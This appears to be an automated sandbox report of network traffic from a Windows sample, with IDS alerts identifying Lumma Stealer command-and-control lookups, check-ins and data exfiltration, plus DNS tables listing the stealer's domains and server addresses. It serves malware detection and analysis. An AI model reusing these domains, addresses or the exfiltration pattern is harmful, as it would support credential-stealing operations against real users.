2024-12-23T07:18:40.337317+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.8 | 62061 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.479723+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.8 | 59570 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.622145+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.8 | 49500 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.855062+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.8 | 60010 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.998287+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.8 | 65050 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:41.223179+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.8 | 57627 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:41.363940+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.8 | 61858 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:43.081330+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T07:18:43.856230+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T07:18:45.487204+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:46.235451+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:46.235451+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:47.484626+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:48.533135+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:48.533135+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:50.240976+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:52.321059+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:54.904598+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:57.514355+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:58.302029+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:19:00.687761+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 104.21.66.86 | 443 | TCP
2024-12-23T07:19:03.935119+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.266535997 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.266660929 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.267119884 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.267138004 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.487121105 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.487204075 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495057106 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495076895 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.495652914 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538031101 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538069010 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:45.538244963 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235445976 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235578060 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235641003 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235929012 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235950947 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235972881 CET49705443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.235980988 CET44349705104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269506931 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269562960 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269670010 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.269989967 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:46.270004988 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.484508991 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.484626055 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486140966 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486152887 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.486474037 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487701893 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487752914 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:47.487795115 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533174992 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533354998 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533422947 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533449888 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533528090 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533571005 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533576012 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533735037 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533782005 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.533787012 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541098118 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541165113 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.541174889 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549415112 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549463987 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.549470901 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.591218948 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.591233969 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.640079975 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.652446032 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.707989931 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.724873066 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728755951 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728838921 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728867054 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.728993893 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.729057074 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737323046 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737360001 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737370968 CET49706443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:48.737376928 CET44349706104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020617008 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020658970 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.020723104 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.021357059 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:49.021373987 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.240864038 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.240976095 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.242630959 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.242640018 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.243446112 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245199919 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245362043 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.245398998 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985196114 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985476971 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985558033 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985652924 CET49707443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:50.985666990 CET44349707104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105545998 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105585098 CET44349708104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.105655909 CET49708443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:51.106030941 CET49708443192.168.2.8104.21.66.86
Dec 23, 2024 07:18:51.106045961 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:52.320871115 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:52.321058989 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:52.322748899 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:52.322758913 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:52.323163033 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:52.324721098 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:52.324923038 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:52.324978113 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:52.325041056 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:52.367371082 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:53.151989937 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:53.152304888 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:53.152368069 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:53.158466101 CET  49708        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:53.158502102 CET  443          49708      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:53.692662954 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:53.692698002 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:53.692795992 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:53.693154097 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:53.693164110 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:54.904139996 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:54.904597998 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:54.905721903 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:54.905728102 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:54.905955076 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:54.907241106 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:54.907407045 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:54.907423973 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:54.907480955 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:54.907486916 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:55.877582073 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:55.877681017 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:55.877756119 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:55.878052950 CET  49710        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:55.878068924 CET  443          49710      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:56.302262068 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:56.302318096 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:56.302453041 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:56.302845001 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:56.302866936 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:57.514264107 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:57.514354944 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:57.515924931 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:57.515933037 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:57.516163111 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:57.523428917 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:57.523525953 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:57.523534060 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:58.302040100 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:58.302145004 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:58.302318096 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:58.302508116 CET  49713        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:58.302531004 CET  443          49713      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:59.475188971 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:59.475277901 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:18:59.475373030 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:59.475744009 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:18:59.475775957 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.687659979 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.687761068 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.689431906 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.689443111 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.689646959 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.691732883 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.692586899 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.692615986 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.693574905 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.693608046 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.693758011 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.693800926 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.693945885 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.693979979 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.694133997 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694173098 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.694333076 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694370031 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.694377899 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694392920 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.694546938 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694574118 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.694600105 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694744110 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.694771051 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.735332012 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.735564947 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.735598087 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.735622883 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.735649109 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:00.735690117 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:00.735708952 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.034374952 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.034466028 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.034552097 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:03.034822941 CET  49714        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:03.034841061 CET  443          49714      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.068788052 CET  49715        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:03.068840981 CET  443          49715      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.068917036 CET  49715        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:03.069262981 CET  49715        443        192.168.2.8    104.21.66.86
Dec 23, 2024 07:19:03.069281101 CET  443          49715      104.21.66.86   192.168.2.8
Dec 23, 2024 07:19:03.935118914 CET  49715        443        192.168.2.8    104.21.66.86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Dec 23, 2024 07:18:39.971143961 CET | 56152 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.109747887 CET | 53 | 56152 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.115628958 CET | 59276 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.334506989 CET | 53 | 59276 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.337316990 CET | 62061 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.475939989 CET | 53 | 62061 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.479722977 CET | 59570 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.618311882 CET | 53 | 59570 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.622144938 CET | 49500 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.851032019 CET | 53 | 49500 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.855062008 CET | 60010 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:40.994257927 CET | 53 | 60010 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:40.998286963 CET | 65050 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:41.219141960 CET | 53 | 65050 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:41.223179102 CET | 57627 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:41.361880064 CET | 53 | 57627 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:41.363940001 CET | 61858 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:41.504023075 CET | 53 | 61858 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:41.507692099 CET | 65534 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:41.646256924 CET | 53 | 65534 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 07:18:44.122273922 CET | 58619 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 07:18:44.264846087 CET | 53 | 58619 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 23, 2024 07:18:39.971143961 CET | 192.168.2.8 | 1.1.1.1 | 0x6aa4 | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.115628958 CET | 192.168.2.8 | 1.1.1.1 | 0x2f9c | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.337316990 CET | 192.168.2.8 | 1.1.1.1 | 0x9f29 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.479722977 CET | 192.168.2.8 | 1.1.1.1 | 0x3c20 | Standard query (0) | necklacebudi.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.622144938 CET | 192.168.2.8 | 1.1.1.1 | 0xe23d | Standard query (0) | energyaffai.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.855062008 CET | 192.168.2.8 | 1.1.1.1 | 0x4835 | Standard query (0) | aspecteirs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.998286963 CET | 192.168.2.8 | 1.1.1.1 | 0xfc07 | Standard query (0) | sustainskelet.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.223179102 CET | 192.168.2.8 | 1.1.1.1 | 0xc4f | Standard query (0) | crosshuaht.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.363940001 CET | 192.168.2.8 | 1.1.1.1 | 0xc622 | Standard query (0) | rapeflowwj.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.507692099 CET | 192.168.2.8 | 1.1.1.1 | 0x3fc5 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:44.122273922 CET | 192.168.2.8 | 1.1.1.1 | 0x7e26 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Dec 23, 2024 07:18:40.109747887 CET | 1.1.1.1 | 192.168.2.8 | 0x6aa4 | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.334506989 CET | 1.1.1.1 | 192.168.2.8 | 0x2f9c | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.475939989 CET | 1.1.1.1 | 192.168.2.8 | 0x9f29 | Name error (3) | discokeyus.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.618311882 CET | 1.1.1.1 | 192.168.2.8 | 0x3c20 | Name error (3) | necklacebudi.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.851032019 CET | 1.1.1.1 | 192.168.2.8 | 0xe23d | Name error (3) | energyaffai.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:40.994257927 CET | 1.1.1.1 | 192.168.2.8 | 0x4835 | Name error (3) | aspecteirs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.219141960 CET | 1.1.1.1 | 192.168.2.8 | 0xfc07 | Name error (3) | sustainskelet.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.361880064 CET | 1.1.1.1 | 192.168.2.8 | 0xc4f | Name error (3) | crosshuaht.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.504023075 CET | 1.1.1.1 | 192.168.2.8 | 0xc622 | Name error (3) | rapeflowwj.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:41.646256924 CET | 1.1.1.1 | 192.168.2.8 | 0x3fc5 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:44.264846087 CET | 1.1.1.1 | 192.168.2.8 | 0x7e26 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:18:44.264846087 CET | 1.1.1.1 | 192.168.2.8 | 0x7e26 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.8 | 49704 | 23.55.153.106 | 443 | 1464 | C:\Users\user\Desktop\0gnHF2twcT.exe

